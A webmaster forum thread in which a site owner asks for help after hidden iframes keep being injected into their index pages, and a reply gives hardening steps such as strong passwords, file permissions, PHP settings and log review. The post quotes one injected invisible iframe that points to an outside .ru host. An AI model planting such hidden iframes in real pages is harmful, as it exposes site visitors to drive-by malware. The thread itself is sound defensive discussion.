Need Urgent Help About Critical Security Problem
We are getting bombarded every so often with someone accessing our site somehow and modifying page content to include ifram tags on index pages of our site.
We have no idea what is causing it how they are getting in or how to stop it.
If anyone has any info or advice please email me asap.
Below is an example of one of the many ifram tags that randomly gets inserted into our index pages on all folders within or site.
From what we have researched some of them are trying to open sites that either download dodgy programs or in some way try to compromise the site or the viewer.
<iframe src="http://3f0.ru:8080/index.php" width=104 height=176 style="visibility: hidden"></iframe>
We have this happen several times a week, not sure if a php script we have installed is somehow compromised and people are exploiting it but here is our site http://www.MyLifestyleSavings.com i am helping build it for someone and they have notified me about the problem and im at a loss.
Thanks in advance for any and all help.
OriginalFundRaisingWidget - Free "Non Commercial" PayPal FundRaising Widget, for Charities, Organizations and Individuals, Hosted Free. Check It Out
First thing is to change all your passwords on the server (including FTP users), making sure you use "strong" passwords for the new ones.
Any directory that does not need to have files written to it by your PHP scripts should have its permissions set so that only the owner (you) has write permission. The corollary is to try to avoid having any sensitive scripts in world-writable directories. (So in other words, make a separate directory for things like file uploads, and leave all your script/include directories read-only for the world.)
Review all your scripts for anywhere that you use user inputs to select files that get included (or worse, executed). If you have control of your PHP settings via php.ini or .htaccess, at the very least turn off allow_url_include, and consider turning off allow_url_fopen if you don't need it.
Review your Apache access logs if you have access to them, and look for things where the URL includes external URLs in the query string, or "../../" type of directory strings trying to move up the directory tree and read something on the server. These may point you toward a script that someone has found a hole in.
"Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be."
~ Terry Pratchett in Nation
I would say that if thats not you thats broke it, someones broken your site...
Parse error: syntax error, unexpected T_STRING, expecting ',' or ';' in /home/mylifest/public_html/index.php on line 86
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
Tags for this Thread